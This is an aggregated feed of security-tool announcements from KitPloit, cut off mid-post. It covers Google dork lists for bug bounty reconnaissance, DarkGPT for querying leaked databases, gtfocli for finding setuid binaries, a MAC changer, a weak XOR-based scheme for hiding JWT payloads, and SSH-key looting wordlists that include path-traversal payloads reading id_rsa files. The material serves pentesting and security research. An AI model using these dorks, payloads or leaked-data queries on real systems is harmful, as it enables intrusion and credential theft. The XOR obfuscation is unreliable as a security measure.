<h2>Hacking Reviews</h2> <p>Leading source of Hacking News, Information Security, Cyber Security, and Network Security.</p> <p>Feed updated 2024-03-18T09:35:29.018-07:00</p> <hr/> <p>Published 2024-03-18T09:34:00.001-07:00</p> <h2>Google-Dorks-Bug-Bounty - A List Of Google Dorks For Bug Bounty, Web Application Security, And Pentesting</h2><div class="post-body entry-content" id="post-body-4744913423381446643" itemprop="articleBody"> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjw0SFLnTOabwaCF-I0fJ6yf9HM_V7lWJyZlAobhJIAzGdn_CJPabbnBf9lYrvxKLgSP5jXfjQJHQVE3QF96d7DULS1GG5pvCY_a_PwnWTNsWfZv4CALnW3SVIeEmcDyNYqShxDQkjrjqjWNO4U94AiOUbGCBHOxpmDwzmU4-lUnGab3GFyihV4TfGMPqfv" rel="nofollow"><img alt="" border="0" height="122" id="BLOGGER_PHOTO_ID_7345638495062138434" src="https://blogger.googleusercontent.com/img/a/AVvXsEjw0SFLnTOabwaCF-I0fJ6yf9HM_V7lWJyZlAobhJIAzGdn_CJPabbnBf9lYrvxKLgSP5jXfjQJHQVE3QF96d7DULS1GG5pvCY_a_PwnWTNsWfZv4CALnW3SVIeEmcDyNYqShxDQkjrjqjWNO4U94AiOUbGCBHOxpmDwzmU4-lUnGab3GFyihV4TfGMPqfv=w640-h122" width="640"/></a></p> <p>A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting</p> <p><a href="https://taksec.github.io/google-dorks-bug-bounty/" rel="nofollow" target="_blank" title="Live Tool">Live Tool</a></p> <h3>Broad domain search w/ negative search</h3> <blockquote> <p>site:example.com -www -shop -share -ir -mfa</p> </blockquote> <h3>PHP extension w/ parameters</h3> <blockquote> <p>site:example.com ext:php inurl:?</p> </blockquote> <h3>Disclosed <a href="https://www.kitploit.com/search/label/XSS" rel="nofollow" 
target="_blank" title="XSS">XSS</a> and Open Redirects</h3> <blockquote> <p>site:openbugbounty.org inurl:reports intext:"example.com"</p> </blockquote> <h3>Juicy Extensions</h3> <blockquote> <p>site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess</p> </blockquote> <h3>XSS prone parameters</h3> <blockquote> <p>inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example.com</p> </blockquote> <h3>Open Redirect prone parameters</h3> <blockquote> <p>inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com</p> </blockquote> <h3>SQLi Prone Parameters</h3> <blockquote> <p>inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example.com</p> </blockquote> <h3>SSRF Prone Parameters</h3> <blockquote> <p>inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example.com</p> </blockquote> <h3>LFI Prone Parameters</h3> <blockquote> <p>inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example.com</p> </blockquote> <h3>RCE Prone Parameters</h3> <blockquote> <p>inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example.com</p> </blockquote> <h3>High % inurl keywords</h3> <blockquote> <p>inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com</p> </blockquote> <h3>Sensitive Parameters</h3> <blockquote> <p>inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:example[.]com</p> </blockquote> <h3>API Docs</h3> <blockquote> <p>inurl:apidocs | inurl:api-docs | inurl:swagger | 
inurl:api-explorer site:"example[.]com"</p> </blockquote> <h3>Code Leaks</h3> <blockquote> <p>site:pastebin.com "example.com"</p> <p>site:jsfiddle.net "example.com"</p> <p>site:codebeautify.org "example.com"</p> <p>site:codepen.io "example.com"</p> </blockquote> <h3>Cloud Storage</h3> <blockquote> <p>site:s3.amazonaws.com "example.com"</p> <p>site:blob.core.windows.net "example.com"</p> <p>site:googleapis.com "example.com"</p> <p>site:drive.google.com "example.com"</p> <p>site:dev.azure.com "example[.]com"</p> <p>site:onedrive.live.com "example[.]com"</p> <p>site:digitaloceanspaces.com "example[.]com"</p> <p>site:sharepoint.com "example[.]com"</p> <p>site:s3-external-1.amazonaws.com "example[.]com"</p> <p>site:s3.dualstack.us-east-1.amazonaws.com "example[.]com"</p> <p>site:dropbox.com/s "example[.]com"</p> <p>site:box.com/s "example[.]com"</p> <p>site:docs.google.com inurl:"/d/" "example[.]com"</p> </blockquote> <h3>JFrog Artifactory</h3> <blockquote> <p>site:jfrog.io "example[.]com"</p> </blockquote> <h3>Firebase</h3> <blockquote> <p>site:firebaseio.com "example[.]com"</p> </blockquote> <h3>File upload endpoints</h3> <blockquote> <p>site:example.com "choose file"</p> </blockquote> <h2>Dorks that work better w/o domain</h2> <h3>Bug Bounty programs and <a href="https://www.kitploit.com/search/label/Vulnerability" rel="nofollow" target="_blank" title="Vulnerability">Vulnerability</a> Disclosure Programs</h3> <blockquote> <p>"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"</p> <p>site:*/security.txt "bounty"</p> </blockquote> <h3>Apache Server Status Exposed</h3> <blockquote> <p>site:*/server-status apache</p> </blockquote> <h3>WordPress</h3> <blockquote> <p>inurl:/wp-admin/admin-ajax.php</p> </blockquote> <h3>Drupal</h3> <blockquote> <p>intext:"Powered by" & intext:Drupal & inurl:user</p> </blockquote> <h3>Joomla</h3> <blockquote> <p>site:*/joomla/login</p> </blockquote> <hr/> <p>Medium articles for more dorks:</p> 
<p>https://thegrayarea.tech/5-google-dorks-every-hacker-needs-to-know-fed21022a906</p> <p>https://infosecwriteups.com/uncover-hidden-gems-in-the-cloud-with-google-dorks-8621e56a329d</p> <p>https://infosecwriteups.com/10-google-dorks-for-sensitive-data-9454b09edc12</p> <p>Top Parameters:</p> <p>https://github.com/lutfumertceylan/top25-parameter</p> <p>Proviesec dorks:</p> <p>https://github.com/Proviesec/google-dorks</p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/TakSec/google-dorks-bug-bounty" rel="nofollow" target="_blank" title="Download Google-Dorks-Bug-Bounty">Download Google-Dorks-Bug-Bounty</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/google-dorks-bug-bounty-list-of-google.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-47078705302533654932024-03-17T09:40:00.001-07:002024-03-17T09:40:59.430-07:00DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes<div class="post-body entry-content" id="post-body-740203000077868011" itemprop="articleBody"> <div style="margin:15px"> </div> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgMuN4qfzQxuoBy88dkXEM1GjaTgAN-BgZ6i-pcphCnL4pzkW7TGP5NgTmVYq0SjPUmyXWAJjK71njnn25nI9m0mgfYRiSU_c7iHYf3j60H76V486B96efUCcvKnz0ReYz2OPNQz0uBZeq_E1jVOrMG6wosEvjsWMJGA-nhM-XUJpnCTZkYBbgkpD2zFekv" rel="nofollow"><img alt="" border="0" height="248" id="BLOGGER_PHOTO_ID_7345627338818753346" src="https://blogger.googleusercontent.com/img/a/AVvXsEgMuN4qfzQxuoBy88dkXEM1GjaTgAN-BgZ6i-pcphCnL4pzkW7TGP5NgTmVYq0SjPUmyXWAJjK71njnn25nI9m0mgfYRiSU_c7iHYf3j60H76V486B96efUCcvKnz0ReYz2OPNQz0uBZeq_E1jVOrMG6wosEvjsWMJGA-nhM-XUJpnCTZkYBbgkpD2zFekv=w640-h248" 
width="640"/></a></p> <p>DarkGPT is an <a href="https://www.kitploit.com/search/label/Artificial%20Intelligence" rel="nofollow" target="_blank" title="artificial intelligence">artificial intelligence</a> assistant based on GPT-4-200K designed to perform queries on <a href="https://www.kitploit.com/search/label/Leaked" rel="nofollow" target="_blank" title="leaked">leaked</a> databases. This guide will help you set up and run the project in your local environment.</p> <h2>Prerequisites</h2> <p>Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.</p> <h2>Environment Setup</h2> <ol> <li><strong>Clone the Repository</strong> <p>First, clone the GitHub repository to your local machine by running the following commands in your terminal:</p> <pre><code>git clone https://github.com/luijait/DarkGPT.git
cd DarkGPT</code></pre></li> <li><strong>Configure Environment Variables</strong> <p>The script needs some environment variables to work correctly. Copy the <code>.env.example</code> file to a new file named <code>.env</code> and fill in your key:</p> <pre><code>DEHASHED_API_KEY="your_dehashed_api_key_here"</code></pre></li> <li><strong>Install Dependencies</strong> <p>This project requires certain Python packages to run. Install them by running the following command:</p> <pre><code>pip install -r requirements.txt</code></pre></li> <li><strong>Run the Project</strong> <pre><code>python3 main.py</code></pre></li> </ol><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/luijait/DarkGPT" rel="nofollow" target="_blank" title="Download DarkGPT">Download DarkGPT</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/darkgpt-osint-assistant-based-on-gpt-4.html" rel="nofollow" target="_blank">www.kitploit.com</a> <hr/> <p>Published 2024-03-16T11:20:00.001-07:00</p> <h2>Gtfocli - GTFO Command Line Interface For Easy Binaries Search Commands That Can Be Used To Bypass Local Security Restrictions In Misconfigured Systems</h2><div class="post-body entry-content" id="post-body-3536309726077760032" itemprop="articleBody"> <h2 style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ" rel="nofollow"><img alt="" border="0" height="210" id="BLOGGER_PHOTO_ID_7345624906969636530" src="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ=w640-h210" width="640"/></a></h2> <p><code>GTFOcli</code> is a <a href="https://www.kitploit.com/search/label/Command%20Line" rel="nofollow" target="_blank" title="Command Line">Command Line</a> Interface for quickly searching binaries whose commands can be used to bypass local security <a href="https://www.kitploit.com/search/label/Restrictions" rel="nofollow" target="_blank" title="restrictions">restrictions</a> in misconfigured systems.</p><span><a 
name='more'></a></span> <h2>Installation</h2> <p>Using <code>go</code>:</p> <pre><code>go install github.com/cmd-tools/gtfocli@latest</code></pre> <p>Using <code>homebrew</code>:</p> <pre><code>brew tap cmd-tools/homebrew-tap
brew install gtfocli</code></pre> <p>Using <code>docker</code>:</p> <pre><code>docker pull cmdtoolsowner/gtfocli</code></pre> <h2>Usage</h2> <h3>Search for unix binaries</h3> <p>Search for <a href="https://www.kitploit.com/search/label/Binary" rel="nofollow" target="_blank" title="binary">binary</a> <code>tar</code>:</p> <pre><code>gtfocli search tar</code></pre> <p>Search for binary <code>tar</code> from <code>stdin</code>:</p> <pre><code>echo "tar" | gtfocli search</code></pre> <p>Search for the binaries listed in a file (one per line):</p> <pre><code>cat myBinaryList.txt
/bin/bash
/bin/sh
tar
arp
/bin/tail

gtfocli search -f myBinaryList.txt</code></pre> <h3>Search for windows binaries</h3> <p>Search for binary <code>Winget.exe</code>:</p> <pre><code>gtfocli search Winget --os windows</code></pre> <p>Search for binary <code>Winget</code> from <code>stdin</code>:</p> <pre><code>echo "Winget" | gtfocli search --os windows</code></pre> <p>Search for the binaries listed in a file (one per line):</p> <pre><code>cat windowsExecutableList.txt
Winget
c:\\Users\\Desktop\\Ssh
Stordiag
Bash
c:\\Users\\Runonce.exe
Cmdkey
c:\dir\subDir\Users\Certreq.exe

gtfocli search -f windowsExecutableList.txt --os windows</code></pre> <p>Search for binary <code>Winget</code> and print the output in <code>yaml</code> format (see <code>-h</code> for available formats):</p> <pre><code>gtfocli search Winget -o yaml --os windows</code></pre> <h3>Search using dockerized solution</h3> <p>Examples:</p> <p>Search for binary <code>Winget</code> and print the output in <code>yaml</code> format:</p> <pre><code>docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows</code></pre> <p>Search for binary <code>tar</code> and print the output in <code>json</code> format:</p> <pre><code>echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json</code></pre> <p>Search for the binaries listed in a file mounted as a volume in the container:</p> <pre><code>cat myBinaryList.txt
/bin/bash
/bin/sh
tar
arp
/bin/tail

docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt</code></pre> <h2>CTF</h2> <p>A common use case for <code>gtfocli</code> is combining it with <code>find</code> to look up every setuid binary on the host:</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null</code></pre> <p>or</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search</code></pre> <h2>Credits</h2> <p>Thanks to <a href="https://gtfobins.github.io/" rel="nofollow" target="_blank" title="GTFOBins">GTFOBins</a> and <a href="https://lolbas-project.github.io/" rel="nofollow" target="_blank" title="LOLBAS">LOLBAS</a>; without these projects <code>gtfocli</code> would never have come to light.</p> <h2>Contributing</h2> <p>You want to contribute to this project? Wow, thanks! 
So please just fork it and send a pull request.</p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/cmd-tools/gtfocli" rel="nofollow" target="_blank" title="Download Gtfocli">Download Gtfocli</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/gtfocli-gtfo-command-line-interface-for.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-39975778365286933382024-03-15T08:59:00.001-07:002024-03-15T08:59:01.800-07:00n0Mac - Yet Another Mac Changer!!!<div class="post-body entry-content" id="post-body-1685240469171419301" itemprop="articleBody"> <div style="margin:15px"> </div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnqQaVINxH2k3nx6UvFjh7i0pBQqg6JTOPwrot6M64uOk9r54CETlnG2_pZlRRZWhu0phd-YEdxvyHV8BbAPO3NkkFottAnMM5X81xz_tx5wlJF8K9D3Izj3cLrz7eGCNP8XWuWxCgdWeDYGKPJD71-qHkkUnmErgarZmO9DBCYr6rIifvwK4LZdgXiPG4/s897/mac-chnager.png" imageanchor="1" rel="nofollow" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="507" data-original-width="897" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnqQaVINxH2k3nx6UvFjh7i0pBQqg6JTOPwrot6M64uOk9r54CETlnG2_pZlRRZWhu0phd-YEdxvyHV8BbAPO3NkkFottAnMM5X81xz_tx5wlJF8K9D3Izj3cLrz7eGCNP8XWuWxCgdWeDYGKPJD71-qHkkUnmErgarZmO9DBCYr6rIifvwK4LZdgXiPG4/w640-h362/mac-chnager.png" width="640"/></a></div><p><br/></p> <p>This script changes the MAC address of the network interface to a randomly generated address on system startup using crontab. 
It then uses the <a href="https://www.kitploit.com/search/label/Macchanger" rel="nofollow" target="_blank" title="macchanger">macchanger</a> command to generate a list of MAC address vendors and selects one at random and then combines that vendor prefix with a randomly generated suffix to create the new MAC address.</p><span><a name='more'></a></span><p><br/></p> <p>Note: This tool is intended for educational purposes only. It is not intended for any malicious activities or any other illegal activities. By using this tool, you agree to the terms and conditions set forth in the disclaimer and accept full responsibility for any misuse of the tool. The author of this tool is not liable for any damages or losses resulting from the use or misuse of this tool by anyone.</p> <br/><span style="font-size: large;"><b>Installation</b></span><br/> <ul> <li>chmod +x install.sh</li> <li>./install.sh</li> </ul> <br/><span style="font-size: large;"><b>Usage</b></span><br/> <ul> <li>chmod +x n0Mac.sh</li> <li>./n0Mac.sh</li> </ul><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/chaudharyarjun/n0Mac" rel="nofollow" target="_blank" title="Download n0Mac">Download n0Mac</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/n0mac-yet-another-mac-changer.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-10211525711867771482024-03-13T02:14:00.001-07:002024-03-13T02:14:07.376-07:00Some-Tweak-To-Hide-Jwt-Payload-Values - A Handful Of Tweaks And Ideas To Safeguard The JWT Payload<div class="post-body entry-content" id="post-body-3612925756192902677" itemprop="articleBody"> <div style="margin:15px"> </div> <p style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y" rel="nofollow"><img alt="" border="0" height="488" id="BLOGGER_PHOTO_ID_7343002266969214786" src="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y=w640-h488" width="640"/></a></p><div><br/></div><span style="font-size: x-large;"><b>some-tweak-to-hide-jwt-payload-values</b></span><ul> <li>a handful of tweaks and ideas to safeguard the JWT payload, making it futile to attempt decoding by constantly altering its value, <br/> ensuring the decoded output remains unintelligible while imposing minimal <a href="https://www.kitploit.com/search/label/Performance" rel="nofollow" target="_blank" title="performance">performance</a> overhead.</li> </ul><span><a name='more'></a></span><div><br/></div> <br/><span style="font-size: large;"><b>What is a JWT Token?</b></span><br/> <p>A JSON Web Token (JWT, pronounced "jot") is a compact and URL-safe way of passing a JSON message between two parties. It's a standard, defined in RFC 7519. The token is a long string, divided into parts separated by dots. Each part is base64 URL-encoded.</p> <p>What parts the token has depends on the type of the JWT: whether it's a JWS (a signed token) or a JWE (an encrypted token). If the token is signed it will have three sections: the header, the payload, and the signature. 
If the token is encrypted it will consist of five parts: the header, the encrypted key, the initialization vector, the <a href="https://www.kitploit.com/search/label/Ciphertext" rel="nofollow" target="_blank" title="ciphertext">ciphertext</a> (payload), and the <a href="https://www.kitploit.com/search/label/Authentication" rel="nofollow" target="_blank" title="authentication">authentication</a> tag. Probably the most common use case for JWTs is to use them as <a href="https://www.kitploit.com/search/label/Access%20Tokens" rel="nofollow" target="_blank" title="access tokens">access tokens</a> and ID tokens in OAuth and OpenID Connect flows, but they can serve other purposes as well.</p> <br/><span style="font-size: large;"><b>Primary Objective of this Code Snippet</b></span><br/> <p>This code snippet offers a tweak aimed at improving the security of the payload section of a JWT, whose stored claims are visible in plaintext once the token is decoded. Typically the payload is only base64-encoded, so it appears in plaintext as soon as the token is decoded. The main objective is to lightly encrypt or obfuscate the payload values so that their meaning is hard to discern: even if someone decodes the payload, they cannot easily interpret the values.</p> <br/><span style="font-size: large;"><b>userid</b></span><br/> <ul> <li>As an example, the code snippet targets the claim named "userid" stored in the payload section.</li> <li>"userid" was chosen because it is frequently used to identify or authenticate the user after the token itself has been validated (e.g., checked for expiry).</li> </ul> <p>The idea behind obscuring the value of the "userid" claim is as follows:</p> <br/><b>Encryption:</b><br/> <ul> <li>The current timestamp is hashed and joined to the user ID with a "|" delimiter.</li> <li>The combined string is encrypted with a bitwise XOR against a symmetric key.</li> <li>The result is then encoded with Base64.</li> </ul> <br/><b>Decryption:</b><br/> <ul> <li>The encrypted value is decoded from Base64.</li> <li>It is decrypted by XORing it with the same symmetric key.</li> <li>This reveals the original user ID and the hashed timestamp in plaintext.</li> <li>The user ID part is extracted by splitting at the "|" delimiter and used as needed.</li> </ul> <br/><b>Symmetric Key for XOR Encoding:</b><br/> <ul> <li>Various materials can be used for this key.</li> <li>It could be the salt used in conventional password hashing, an arbitrary random string, a generated UUID, or any other suitable material.</li> <li>Whatever is chosen, the key must be stored securely in the <a href="https://www.kitploit.com/search/label/Database%20Management" rel="nofollow" target="_blank" title="database management">database management</a> system (DBMS).</li> </ul> <p>A further note on the claim name:</p> <p>In the example the claim is shown as <code>{ 'userid': 'random_value' }</code>, which makes it obvious that it holds a user ID. That is only for illustration. In practice a predetermined, undisclosed name is used instead, for example <code>'a': 'changing_random_value'</code>.</p> <br/><span 
style="font-size: large;"><b>Notes</b></span><br/> <ul> <li>This code snippet is created for educational purposes and serves as a starting point for ideas rather than being inherently secure.</li> <li>It provides a level of security beyond plaintext visibility but does not guarantee absolute safety.</li> </ul> <p>Attempting to tamper with JWT tokens generated using this method requires access to both the JWT secret key and the XOR symmetric key used to create the UserID.</p> <br/><span style="font-size: x-large;"><b>And...</b></span><br/> <ul> <li>If you find this helpful, please give it a <strong>star</strong> ⭐ to support further improvements.</li> </ul> <br/><span style="font-size: x-large;"><b>preview</b></span><br/> <pre><code># python3 main.py
- Current Unix Timestamp: 1709160368
- Current Unix Timestamp to Human Readable: 2024-02-29 07:46:08
- userid: 23243232
- XOR Symmetric key: b'generally_user_salt_or_hash_or_random_uuid_this_value_must_be_in_dbms'
- JWT Secret key: yes_your_service_jwt_secret_key
- Encoded UserID and Timestamp: VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo=
- Decoded UserID and Hashed Timestamp: 23243232|e27436b7393eb6c2fb4d5e2a508a9c5c
- JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0aW1lc3RhbXAiOiIyMDI0LTAyLTI5IDA3OjQ2OjA4IiwidXNlcmlkIjoiVlZaY1VVRlRYMTRGT2tkRVVVRnBFVlpmVFd3S0VHa0xVeFVLYXd0SE9rQUFXMVJYREdZV1FBbz0ifQ.bM_6cBZHdXhMZjyefr6YO5n5X51SzXjyBUEzFiBaZ7Q
- Decoded JWT: {'timestamp': '2024-02-29 07:46:08', 'userid': 'VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo='}

# run again
- Decoded JWT: {'timestamp': '2024-02-29 08:16:36', 'userid': 'VVZcUUFTX14FaRNAVBRpRQcORmtWRGl eVUtRZlYXaBZZCgYOWGlDR10='}
- Decoded JWT: {'timestamp': '2024-02-29 08:16:51', 'userid': 'VVZcUUFTX14FZxMRVUdnEgJZEmxfRztRVUBabAsRZkdVVlJWWztGQVA='}
- Decoded JWT: {'timestamp': '2024-02-29 08:17:01', 'userid': 'VVZcUUFTX14FbxYQUkM8RVRZEmkLRWsNUBYNb1sQPREFDFYKDmYRQV4='}
- Decoded JWT: {'timestamp': '2024-02-29 08:17:09', 'userid': 'VVZcUUFTX14FbUNEVEVqEFlaTGoKQjxZBRULOlpGPUtSClALWD5GRAs='}</code></pre><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/password123456/some-tweak-to-hide-jwt-payload-values" rel="nofollow" target="_blank" title="Download Some-Tweak-To-Hide-Jwt-Payload-Values">Download Some-Tweak-To-Hide-Jwt-Payload-Values</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/some-tweak-to-hide-jwt-payload-values.html" rel="nofollow" target="_blank">www.kitploit.com</a> <hr/> <p>Published 2024-03-13T02:08:00.001-07:00</p> <h2>SSH-Private-Key-Looting-Wordlists - A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names</h2><div class="post-body entry-content" id="post-body-7388838676793839543" itemprop="articleBody"> <div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrjGoKBeldOeOVg7ymvz5LxZZwgsTOlPBBU4PeEbKPjT1NMJVmrIfAGS5Sgo3eboReU7mNkZFN7aR69s9EXMS8mF7c6sTL6eCO-SDLdR8p4JejVKA5uBwzHI08ruU0Nz1vrCPBnUc22EFgRyfvkE4RwG2vBWzz5ovqriERHilypuZbglFuV-5zCq-KAcR/s897/SSH%20Private%20Key%20Looting%20Wordlists.png" imageanchor="1" rel="nofollow" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="507" data-original-width="897" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvrjGoKBeldOeOVg7ymvz5LxZZwgsTOlPBBU4PeEbKPjT1NMJVmrIfAGS5Sgo3eboReU7mNkZFN7aR69s9EXMS8mF7c6sTL6eCO-SDLdR8p4JejVKA5uBwzHI08ruU0Nz1vrCPBnUc22EFgRyfvkE4RwG2vBWzz5ovqriERHilypuZbglFuV-5zCq-KAcR/w640-h362/SSH%20Private%20Key%20Looting%20Wordlists.png" width="640"/></a></div><p>SSH Private Key Looting Wordlists. A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names.</p><span style="font-size: large;"><b>LFI for Lateral Movement? Gain SSH Access?</b></span><br/> <pre><code>?file=../../../../../../../../home/user/.ssh/id_rsa
?file=../../../../../../../../home/user/.ssh/id_rsa-cert</code></pre> <br/><span style="font-size: x-large;"><b>SSH Private Key Looting <a href="https://www.kitploit.com/search/label/Wordlists" rel="nofollow" target="_blank" title="Wordlists">Wordlists</a> 🔒🗝️</b></span><br/> <p>This repository contains a collection of wordlists to aid in locating or brute-forcing SSH private key file names. These wordlists can be useful for penetration testers, security researchers, and anyone else interested in assessing the security of SSH configurations.</p> <br/><span style="font-size: large;"><b>Wordlist Files 📁</b></span><br/> <ul> <li><strong>ssh-priv-key-loot-common.txt</strong>: Default and common naming conventions for SSH private key files.</li> <li><strong>ssh-priv-key-loot-medium.txt</strong>: Probable file names without backup file extensions.</li> <li><strong>ssh-priv-key-loot-extended.txt</strong>: Probable file names with backup file extensions.</li> <li><strong>ssh-priv-key-loot-*_w_gui.txt</strong>: Includes file names simulating Ctrl+C and Ctrl+V on servers with a GUI.</li> </ul> <br/><span style="font-size: large;"><b>Usage 🚀</b></span><br/> <p>These wordlists can be used with tools such as Burp Intruder, Hydra, custom Python scripts, or any other <a href="https://www.kitploit.com/search/label/Bruteforcing" rel="nofollow" target="_blank" title="bruteforcing">bruteforcing</a> tool that supports custom wordlists. They can help expand the scope of your brute-forcing or <a href="https://www.kitploit.com/search/label/Enumeration" rel="nofollow" target="_blank" title="enumeration">enumeration</a> efforts when targeting SSH private key files.</p> <br/><span style="font-size: large;"><b>Acknowledgements 🙏</b></span><br/> <p>This <a href="https://www.kitploit.com/search/label/Wordlist" rel="nofollow" target="_blank" title="wordlist">wordlist</a> repository was inspired by John Hammond in his vlog "<a href="https://www.youtube.com/watch?v=2rqb3YSa1SE" rel="nofollow" target="_blank" title="Don't Forget This One">Don't Forget This One </a><a href="https://www.kitploit.com/search/label/Hacking" rel="nofollow" target="_blank" title="Hacking">Hacking</a> Trick."</p> <br/><span style="font-size: large;"><b>Disclaimer ⚠️</b></span><br/> <p>Please use these wordlists responsibly and only on systems you are authorized to test. 
Unauthorized use is illegal.</p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/PinoyWH1Z/SSH-Private-Key-Looting-Wordlists" rel="nofollow" target="_blank" title="Download SSH-Private-Key-Looting-Wordlists">Download SSH-Private-Key-Looting-Wordlists</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/ssh-private-key-looting-wordlists.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-84828600686226918902024-03-12T11:22:00.001-07:002024-03-12T11:22:04.114-07:00Nomore403 - Tool To Bypass 403/40X Response Codes<div class="post-body entry-content" id="post-body-5846935525376148964" itemprop="articleBody"> <div style="margin:15px"> </div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivzZU64br4YS64jYeream1ZEaf6xe7OkTHjUKwdIPkgyWLDpQAHsOQXPWrR5XWPj2Fwqyv0gqMAbj0Dr8iglUt75s6rnIXyvr4lvNpKmoVp4AWQSaJk3HyRBvHhpDdzbiRq-EVBymK2xQqLQB2v8qKDjyMz4Z7QeJv-MrmOWaBgdvjVeOrrdkyw06GCHot/s1233/Nomore403.png" imageanchor="1" rel="nofollow" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="1233" height="218" 